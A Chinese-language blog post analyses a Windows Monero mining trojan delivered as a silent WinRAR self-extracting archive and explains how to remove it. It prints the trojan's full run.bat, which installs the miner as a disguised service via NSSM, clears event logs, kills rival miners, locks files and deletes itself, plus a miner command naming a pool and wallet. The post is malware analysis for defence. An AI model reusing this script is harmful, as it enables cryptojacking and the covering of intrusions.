Windows下的挖矿木马查杀

MS016小组（原创）

上一篇文章 简单讲了一下挖矿木马 大概流程  文章地址：

https://www.cnblogs.com/ms016/articles/7978880.html

今天讲分析一个挖矿木马了解ta的原理 和查杀方式  讲的是Windows挖矿木马 也是 门罗币 对比其ta挖矿木马 也许替换挖矿程序 就可以了 所以基本其ta挖矿

基本都相同 先看挖矿木马吧

其实看图标就像一个解压包 就是winrar 下的 弄成静默安装 我们用winrar 打开看看

右边的信息 代表 静默包完成什么操作

Path 运行静默包 会把里面的程序释放到 path 信息上的路径

路径 C:\Windows\daozai

Setup 运行 path路径 里面的程序

运行路径下的 run.bat 处理文件C:\Windows\daozai\run.bat

后面基本都是设置成不需要提示直接运行静默包

然后解压文件分析这几个文件做什么的

Run.bat 是启动批处理

Run64.bat 运行钱包程序的 批处理

Svchost.exe 是NSSM一款守护进程的软件

Win1ogin.exe 是挖矿程序

了解这些文件的区别就逐个分析

先看看run.bat批处理

echo Havefun
C:\Windows\daozai\svchost.exe install "Windows32_Update" "C:\Windows\daozai\run64.bat"
C:\Windows\daozai\svchost.exe start Windows32_Update
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
echo Havefun
@sc delete Systemss
@sc delete Service
@sc delete TeamServers
@sc delete WMIserver
@sc delete WMIservers
@sc delete WMI
@sc delete Serv
@sc delete system_update
@sc delete system_updatea
@sc config wuauserv start= delayed-auto
@echo off
for %%a in (
spoolsvs.exe
taskhost.exe
NsCpuapl.exe
MSASCui.exe
nheqminer_zcash.exe
nssm.exe
update.exe
server.exe
sppscv.exe
taskhost.exe
acnom.exe
acnon.exe
control.exe
install.exe
kill.exe
ntuhost.exe
Terms.EXE
winhost.exe
netcore.exe
Service.exe
cpuminer-aes-sse42.exe
Network.exe
TeamServers.exe
) do taskkill /f /im %%a
@echo off
cacls c:\windows\Fones\Service.exe  /e /d everyone
cacls c:\windows\d11cache\TeamServers.exe e /d everyone
cacls C\Windows\d11cache\Network.exe e /d everyone
cacls c:\windows\d11cache\cpuminer-aes-sse42.exe e /d everyone
cacls C:\Windows\netcore.exe e /d everyone
cacls C:\Windows\winhost.exe e /d everyone
cacls C:\Windows\Terms.EXE e /d everyone
cacls c:\windows\ntuhost.exe e /d everyone
cacls c:\windows\d11cache  /e /d everyone
cacls C\SysData /e /d everyone
ping -n 5 127.0.0.1
taskkill /im mscorsvw.exe /f
taskkill /im WUDFHost.exe /f
taskkill /im nheqminer.exe /f
taskkill /im NsCpuCNMiner64.exe /f
taskkill /im NsCpuCNMiner.exe /f
taskkill /f /im mssecsvc.exe /f
taskkill /f /im taskhost.exe  /f
taskkill /f /im  sppscv.exe /f
del %sfxcmd%
del %0
exit

　　

前面是调用NSSM软件守护挖矿程序

然后启动钱包批处理

NSSM 开始守护

清除系统日志 关闭一些服务 在清理进程

里面有些进程可能 是别的挖矿大牛常用的 是为了 方便清理别人的进程

在看Run64.exe批处理

win1ogin.exe -a cryptonight -o stratum+tcp://mine.ppxxmr.com:5555 -u 42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo+update -p 123

矿池 mine.ppxxmr.com

钱包42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo

-p 123 参数 cpu 应该是跑3个核心

然后开始调用挖矿程序

讲完挖矿静默包的运行流程

如果种了挖矿程序怎么查杀

我点击运行Update.exe 静默包

点击运行这个静默包 本身会自身删除的 所以基本不会保留

运行完挖矿静默包 计算机的任务管理器不见了

Cmd命令 打开任务管理器打不开

友情提示： 有些挖矿 会欺骗用户  比如电脑运行缓慢 打开任务管理器

任务管理器上的cpu显示正常 关闭任务管理器 电脑又卡了

所以还是用第三方的一些管理工具查看比较好

cpu 百分之百了

挖矿程序占用最高 权限是system system是看不到的 不再administrator同一桌面

NSSM是守护进程 先把守护进程结束掉在结束掉挖矿程序

NSSM会自启动挖矿程序

NSSM会把挖矿程序写入自启动 服务里面 所以必须把这个服务停用或卸载掉

NSSM里面有卸载命令

nssm remove <servicename> confirm

　　

卸载命令

就删除了服务

最后清理目录下的挖矿程序

黑客利用NSSM这个软件 也是方便免杀 因为这种软件 一般都不会被添加到病毒库里面

友情提示：

国外的安全厂商为了 封杀算力 大的挖矿僵尸网络 会联系矿池 管理员要求 停止支付黑客钱包 来打击黑客

@感谢刀仔提供技术支持